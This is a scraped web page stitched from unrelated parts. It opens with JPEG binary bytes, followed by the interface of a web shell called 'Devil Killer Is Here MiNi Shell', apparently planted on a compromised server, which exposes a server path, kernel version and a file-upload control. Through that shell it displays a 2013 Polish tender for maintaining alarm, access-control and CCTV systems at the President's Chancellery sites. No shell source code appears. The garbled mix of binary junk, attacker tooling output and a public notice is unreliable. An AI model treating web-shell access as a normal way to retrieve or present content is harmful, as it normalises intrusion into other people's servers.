JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/182040-N-2013.html

<p class="kh_header"><b>Warszawa: Konserwacja systemów techniki ochronnej w obiektach Kancelarii Prezydenta RP.</b><br>
<b>Numer ogłoszenia: 182040 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kancelaria Prezydenta RP , ul. Wiejska 10, 00-902 Warszawa, woj. mazowieckie, tel. 022 6952863, faks 695-28-62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prezydent.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja Publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja systemów techniki ochronnej w obiektach Kancelarii Prezydenta RP..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest konserwacja systemów techniki ochronnej w okresie 36 miesięcy, w niżej wymienionych obiektach Kancelarii Prezydenta RP:
a) Rezydencja Prezydenta RP ZAMEK w Wiśle - Narodowy Zespół Zabytkowy;
b) Rezydencja Prezydenta RP Promnik;
c) Dworek Prezydenta RP - Ośrodek Informacyjno-Edukacyjny w Ciechocinku;
d) Rezydencja w Klarysewie;
e) Archiwum Prezydenta RP w Warszawie przy ul. Augustówka 6;
f) Zespół Rezydencji Belweder - Klonowa  w Warszawie przy ul. Flory 2;
g) Siedziba Kancelarii Prezydenta RP w Warszawie przy ul. Wiejskiej 10;
h) Pałac Prezydencki w Warszawie przy ul. Krakowskie Przedmieście 46/48. 
2. Pracami konserwacyjnym objęte będą systemy techniki ochronnej w skład których wchodzą:
a) System Sygnalizacji Włamania i Napadu (SWiN);
b) System Kontroli Dostępu (KD);
c) System Telewizji Przemysłowej (CCTV).
3. Czasokresy konserwacji:
a) Systemu SWiN - 1 raz na kwartał w okresie 3 lat (9 systemów) ; 
b) Systemu Kontroli Dostępu KD - 1 raz na pół roku w okresie 3 lat (4 systemy);
c) Konserwacja systemu CCTV - 1 raz na kwartał w okresie 3 lat (8 systemów)
wraz z  zachowaniem wymaganej dostępności serwisu i czasu reakcji w okresie trwania umowy.
4. Terminy w których będą prowadzone prace konserwacyjne w poszczególnych obiektach nie mogą się pokrywać.
5. Po zakończeniu przeglądu konserwacyjnego każdy system objęty będzie 7-dniowym okresem w trakcie trwania, którego sprawdzana będzie prawidłowa praca systemu. 
6. Wykonawca zapewni gotowość świadczenia usług konserwacyjnych przez: 
      Dla systemu SWiN
a) Rezydencja Prezydenta RP ZAMEK w Wiśle:
- Od poniedziałku do piątku  - 24 h na dobę
- W święta i dni wolne od pracy - 24 h na dobę
b) Rezydencja Prezydenta RP Promnik:
- Od poniedziałku do piątku  - 24 h na dobę
- W święta i dni wolne od pracy - 24 h na dobę 
c) Dworek Prezydenta RP w Ciechocinku: 
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy 
d) Rezydencja w Klarysewie:
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy
e) Archiwum Prezydenta RP w Warszawie:
- Od poniedziałku do piątku  - 24 h na dobę 
- W święta i dni wolne od pracy - 24 h na dobę
f) Pomieszczenia Specjalne nr 1 zlokalizowane w siedzibie KPRP (ul. Wiejska 10):
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy
g) Pomieszczenia Specjalne nr 2 zlokalizowane w siedzibie KPRP (ul. Wiejska 10):
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy
h) Pomieszczenia Specjalne nr 3 zlokalizowane w siedzibie KPRP (ul. Wiejska 10):
- Od poniedziałku do piątku  - 24 h na dobę 
- W święta i dni wolne od pracy - 24 h na dobę
i) Pomieszczenia Specjalne zlokalizowane w Pałacu Prezydenckim (ul. Krakowskie Przedmieście 46/48)
- Od poniedziałku do piątku  - 24 h na dobę 
- W święta i dni wolne od pracy - 24 h na dobę.
Dla systemu KD
a) Rezydencja Prezydenta RP ZAMEK w Wiśle:
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy
b) Archiwum Prezydenta RP w Warszawie:
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00 
- W święta i dni wolne od pracy - nie dotyczy
c) Pomieszczenia Specjalne nr 3 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) 
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00 
- W święta i dni wolne od pracy - nie dotyczy
d) Pomieszczenia Specjalne zlokalizowane w Pałacu Prezydenckim (ul. Krakowskie Przedmieście 46/48)
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00 
- W święta i dni wolne od pracy - nie dotyczy
Dla systemu CCTV
a) Rezydencja Prezydenta RP ZAMEK w Wiśle: 
- Od poniedziałku do piątku  - 24 h na dobę
- W święta i dni wolne od pracy - 24 h na dobę
b) Rezydencja Prezydenta RP Promnik:
- Od poniedziałku do piątku  - 24 h na dobę
- W święta i dni wolne od pracy - 24 h na dobę 
c) Dworek Prezydenta RP w Ciechocinku: 
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy 
d) Rezydencja w Klarysewie:
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy
e) Archiwum Prezydenta RP w Warszawie:
- Od poniedziałku do piątku  - 24 h na dobę 
- W święta i dni wolne od pracy - 24 h na dobę
f) Zespół Rezydencji Belweder - Klonowa: 
- Od poniedziałku do piątku  - w godzinach od 8:00 do 17:00
- W święta i dni wolne od pracy - nie dotyczy
g) Pomieszczenia Specjalne nr 3 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) 
- Od poniedziałku do piątku  - 24 h na dobę 
- W święta i dni wolne od pracy - 24 h na dobę
h) Pomieszczenia Specjalne zlokalizowane w Pałacu Prezydenckim 
(ul. Krakowskie Przedmieście 46/48)
- Od poniedziałku do piątku  - 24 h na dobę 
- W święta i dni wolne od pracy - 24 h na dobę
7. Czas reakcji serwisu na zgłoszenie awarii:
Dla systemu SWiN
a. Rezydencja Prezydenta RP w Wiśle - maksymalnie następny dzień liczony od momentu zgłoszenia
b. Rezydencja Prezydenta RP Promnik - maksymalnie następny dzień liczony od momentu zgłoszenia
c. Dworek Prezydenta RP w Ciechocinku - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia 
d. Rezydencja w Klarysewie - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia
e. Archiwum Prezydenta RP - maksymalnie 8 godzin liczonych od momentu zgłoszenia.
f. Pomieszczenia Specjalne nr 1 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia
g. Pomieszczenia Specjalne nr 2 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia
h. Pomieszczenia Specjalne nr 3 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) - maksymalnie 8 godzin liczonych od momentu zgłoszenia.
i. Pomieszczenia Specjalne zlokalizowane w Pałacu Prezydenckim (ul. Krakowskie Przedmieście 46/48) - maksymalnie 8 godzin liczonych od momentu zgłoszenia.
Dla systemu KD
a) Rezydencja Prezydenta RP ZAMEK w Wiśle - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia.
b) Archiwum Prezydenta RP - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia.
c) Pomieszczenia Specjalne nr 3 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia.
d) Pomieszczenia Specjalne zlokalizowane w Pałacu Prezydenckim (ul. Krakowskie Przedmieście 46/48)- maksymalnie następny dzień roboczy liczony od momentu zgłoszenia.
Dla systemu CCTV
a) Rezydencja Prezydenta RP ZAMEK w Wiśle - maksymalnie następny dzień liczony od momentu zgłoszenia
b) Rezydencja Prezydenta RP Promnik - maksymalnie następny dzień liczony od momentu zgłoszenia
c) Dworek Prezydenta RP w Ciechocinku - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia 
d) Rezydencja Prezydenta RP w Klarysewie - maksymalnie następny dzień roboczy liczony od momentu zgłoszenia
e) Archiwum Prezydenta RP - maksymalnie 8 godzin liczonych od momentu zgłoszenia
f) Zespół Rezydencji Belweder -Klonowa -  maksymalnie następny dzień roboczy liczony od momentu zgłoszenia
g) Pomieszczenia Specjalne nr 3 zlokalizowane w siedzibie KPRP (ul. Wiejska 10) - maksymalnie 8 godzin liczonych od momentu zgłoszenia
h) Pomieszczenia Specjalne zlokalizowane w Pałacu Prezydenckim (ul. Krakowskie Przedmieście 46/48) - maksymalnie 8 godzin liczonych od momentu zgłoszenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3, 50.70.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający, zgodnie z art. 45 ust 2 ustawy, nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie uprawnień poprzez dostarczenie ważnej koncesji wydanej przez Ministra Spraw Wewnętrznych na prowadzenie działalności gospodarczej w zakresie projektowania, montażu, obsługi i konserwacji systemów zabezpieczenia technicznego dotyczących Ochrony Osób i Mienia zgodnie z ustawą O Ochronie Osób i Mienia (Dz. U. z 1997 r. Nr 114, poz. 740 
z późn. zmian.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, jednej głównej usługi w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (wzór wniosku dostępny na stronie Zamawiającego), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.  (załącznik nr 5 do wniosku)
Zamawiający za główną usługę uzna łączne wykonanie:
a) usług konserwacyjnych w zakresie systemów sygnalizacji włamania i napadu opartych o centrale GALAXY lub/i SINTONY lub/i  SATEL (centrale alarmowe) lub/i DSC lub/i SZERSZEŃ o łącznej wartości min. 50.000 zł brutto;
b) usług konserwacyjnych w zakresie systemów kontroli dostępu opartych o urządzenia FALCON lub/i VEMCO lub/i DELTA CONTROLS o łącznej wartości min. 20.000 zł brutto;
c) usług konserwacyjnych w zakresie systemów telewizji przemysłowej budowanych w oparciu o sprzęt firm: ULTRAK lub/i SAMSUNG lub/i BOSCH o łącznej wartości min. 40.000 zł brutto.
 W przypadku wykonywania usług wymienionych w pkt. a, b i c w ramach jednego kontraktu (jednej umowy) należy zachować wymóg dotyczący minimalnych wartości za poszczególne usługi.
Ponadto Wykonawcy załączą poświadczenie potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie potencjału technicznego poprzez dysponowanie sprzętem i oprogramowaniem umożliwiającym bieżącą aktualizację w wersji elektronicznej (format Auto CAD) i wydruk  (do formatu papieru A2 włącznie) dokumentacji projektowej systemów techniki ochronnej. (załącznik nr 3 do wniosku)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować dysponowanie personelem odpowiedzialnym za realizację zamówienia wraz ze stosownymi uprawnieniami tj.: min. 4 instalatorów systemów alarmowych, którzy posiadają (załącznik nr 4 do wniosku):
a) aktualne poświadczenia bezpieczeństwa osobowego, co najmniej do klauzuli poufne, w rozumieniu ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r. Nr 182, poz. 1228) dla pełnomocnika ds. ochrony informacji niejawnych oraz pracowników realizujących prace wymagające dostępu do informacji niejawnych;
b) licencje pracownika zabezpieczenia technicznego I lub II stopnia (kierujący pracami konserwacyjnymi powinien posiadać licencję II stopnia);
c) kwalifikacje do instalowania i konserwowania systemów sygnalizacji włamania i napadu SA-3 i SA-4 (wg. PN-93 E-08390/14) lub stopniu 3 - 4 (wg. PN-EN-50131-1);
w tym min. dwóch instalatorów, którzy posiadają licencje pracownika zabezpieczenia technicznego II stopnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 9 do SIWZ).
3. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w pkt. III.3 ogłoszenia polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
a) dokumentów dotyczących zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) dokumentów dotyczących sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1. Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt. III.4) na podstawie złożonego wraz z wnioskiem o dopuszczenie do udziału w postępowaniu, oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy i na podstawie złożonych dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków.
2. Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia.
3. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń i dokumentów potwierdzających spełnianie: warunków udziału w postępowaniu i wymagań określonych przez Zamawiającego, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu.
4. Jeżeli Wykonawca nie złoży oświadczenia o spełnianiu warunków udziału w postępowaniu lub  dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy, Zamawiający wykluczy Wykonawcę odpowiednio na podstawie art. 24 ust. 1 i 2 ustawy.
5. Niespełnienie któregokolwiek z warunków będzie skutkowało wykluczeniem Wykonawcy z postępowania.
6. W przypadku, gdy liczba Wykonawców  będzie  większa niż określona w ogłoszeniu, Zamawiający zaprosi do złożenia ofert Wykonawców, którzy wykażą najwyższą łączną wartość wykonanych usług konserwacyjnych systemów technik ochronnych określonych w przedmiocie zamówienia oraz złożą dokumenty potwierdzające, że usługi te zostały wykonane należycie. ( załącznik nr 5A do wniosku)
7. Usługi, o których mowa w pkt. 6 to usługi ponad te, które zostały ujęte w wykazie wykonanych usług na potwierdzenie spełniania warunków udziału w postępowaniu.
8. Przy klasyfikacji Wykonawców do dalszego etapu Zamawiający będzie się kierował kryterium:
Łączna wartość wykonanych usług konserwacyjnych - 100%
9. Ocena punktowa dokonana zostanie zgodnie z formułą:
                             łączna badana wartość wykonanych usług
Ocena = --------------------------------------------------------------------- x 100 
      łączna maksymalna wartość wykonanych usług

10. Jeżeli liczba Wykonawców, którzy spełniają w/w warunki udziału w postępowaniu jest mniejsza niż określona w ogłoszeniu, Zamawiający zaprasza do składania ofert wszystkich Wykonawców spełniających warunki udziału w postępowaniu.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Cena za 1 roboczogodzinę - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, z wyjątkiem zmian przewidzianych w ogłoszeniu o zamówieniu oraz specyfikacji istotnych warunków zamówienia, tj.:
